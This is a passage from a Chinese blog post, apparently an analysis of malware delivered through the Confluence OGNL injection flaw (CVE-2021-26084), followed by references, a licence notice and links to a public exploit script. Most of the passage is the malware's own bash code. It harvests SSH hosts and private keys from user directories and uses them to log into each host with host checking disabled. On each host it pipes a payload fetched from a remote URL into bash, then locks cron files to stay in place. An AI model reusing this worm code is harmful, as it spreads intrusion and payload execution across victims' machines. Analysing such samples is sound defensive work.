HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
)
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
chmod +r $key; chmod 400 $key
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"
done
done
done
rm -rf "$DIR"/2start.jpg
rm -rf "$DIR"/xmi
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
参考 https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md https://www.exploit-db.com/exploits/50243 https://cloud.tencent.com/developer/article/1744547 https://bbs.huaweicloud.com/blogs/202738
本文由 至简 创作,采用 知识共享署名4.0 国际许可协议进行许可
本站文章除注明转载/出处外,均为本站原创或翻译,转载前请务必署名
最后编辑时间为:
2022/02/10 14:26
漏洞原理 https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
漏洞利用脚本 https://github.com/h3v0x/CVE-2021-26084_Confluence/blob/main/Confluence_OGNLInjection.py
官方升级说明 https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html